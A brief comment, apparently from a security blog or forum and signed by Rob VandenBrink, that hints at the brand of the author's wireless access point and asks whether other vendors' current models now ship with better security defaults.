I invite your comments - my AP's name starts with an L and ends with an S (made by our friends at C***o).  Are the current models from other vendors implementing better defaults now too?

Rob VandenBrink